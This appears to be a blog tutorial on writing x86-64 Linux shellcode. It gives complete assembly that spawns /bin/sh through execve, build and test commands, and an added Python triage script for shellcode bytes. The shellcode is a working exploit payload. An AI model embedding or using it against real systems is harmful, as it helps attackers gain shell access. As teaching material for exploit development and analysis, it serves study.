Thursday, November 16, 2017

Creating Simple x64 Shellcode



Save this as shell.asm

global _start

_start:
    jmp short   shell_call          ; jump down to the call

shellcode:
    pop         rsi                 ; rsi = address of "/bin/sh" (pushed by the call below)
    xor         rax, rax            ; rax = 0
    mov byte    [rsi + 7], al       ; null-terminate the string ("/bin/sh" is 7 bytes)
    mov qword   [rsi + 8], rsi      ; argv[0] = pointer to "/bin/sh"
    mov qword   [rsi + 16], rax     ; argv[1] = NULL
    lea         rdi, [rsi]          ; 1st execve arg: rdi = pathname
    lea         rsi, [rsi + 8]      ; 2nd execve arg: rsi = argv array built above
    lea         rdx, [rax]          ; 3rd execve arg: rdx = envp = NULL
    xor         al, 0x3b            ; rax = 59, execve on x86-64 Linux (al is already 0)
    syscall

shell_call:
    call    shellcode               ; pushes the address of the string below as the return address
    db      "/bin/sh"

Assemble the asm file with nasm:
nasm -f elf64 shell.asm -o shell.o

You can view the assembled bytes and their disassembly by dumping the object file with objdump:
objdump -D shell.o


You can test the shellcode by linking the object file into an executable. Because the code writes into its own .text section (the null terminator at the end of "/bin/sh" and the argv array just past it), that section has to be writable, so I specified -N, which makes the text segment read/write:

ld -N -o shell shell.o
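A triage script for the assembled bytes, added here as an example and not part of the original post. It assumes the raw .text bytes were dumped first with `objcopy -O binary --only-section=.text shell.o shell.bin` (a binutils step the post does not show) and reports the blob's length, any null bytes that would truncate a string-copy delivery, and each syscall site with a heuristic guess at the syscall number loaded before it (the `xor al, 0x3b` idiom above).

```python
"""Triage helper for raw x86-64 shellcode bytes (added example, not from the post).
Input: the .text bytes of shell.o, e.g. dumped with
    objcopy -O binary --only-section=.text shell.o shell.bin
Reports length, null bytes, syscall sites and a heuristic syscall-number guess."""
import sys

SYSCALL = b"\x0f\x05"  # encoding of the `syscall` instruction
# Small subset of the x86-64 Linux syscall numbers (architecture constants).
NAMES = {0x00: "read", 0x01: "write", 0x02: "open", 0x3b: "execve", 0x3c: "exit"}


def guess_syscall_number(code: bytes, at: int):
    """Look back from the syscall at offset `at` for the instruction that set al.
    Heuristic: hand-written shellcode loads the number with `xor al, imm8` (34 ib)
    or `mov al, imm8` (b0 ib); `xor al, imm8` equals imm8 only when al was zero,
    as after the `xor rax, rax` in the post.  Returns None if neither idiom is found
    (e.g. `mov eax, imm32`, which also introduces null bytes)."""
    for i in range(at - 2, max(at - 16, -1), -1):
        if code[i] in (0x34, 0xB0):
            return code[i + 1]
    return None


def analyse(code: bytes) -> dict:
    """Properties worth checking before a shellcode blob is trusted or delivered."""
    sites = [i for i in range(len(code) - 1) if code[i:i + 2] == SYSCALL]
    calls = []
    for off in sites:
        num = guess_syscall_number(code, off)
        calls.append((off, num, NAMES.get(num, "?")))  # (offset, number, name)
    return {
        "length": len(code),
        "null_offsets": [i for i, b in enumerate(code) if b == 0],  # break strcpy-style delivery
        "syscalls": calls,
        "c_string": "".join(f"\\x{b:02x}" for b in code),
    }


if __name__ == "__main__":
    # Constructed sample used when no file is given: xor rax,rax ; xor al,0x3b ; syscall
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else b"\x48\x31\xc0\x34\x3b\x0f\x05"
    for key, value in analyse(blob).items():
        print(f"{key}: {value}")
```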
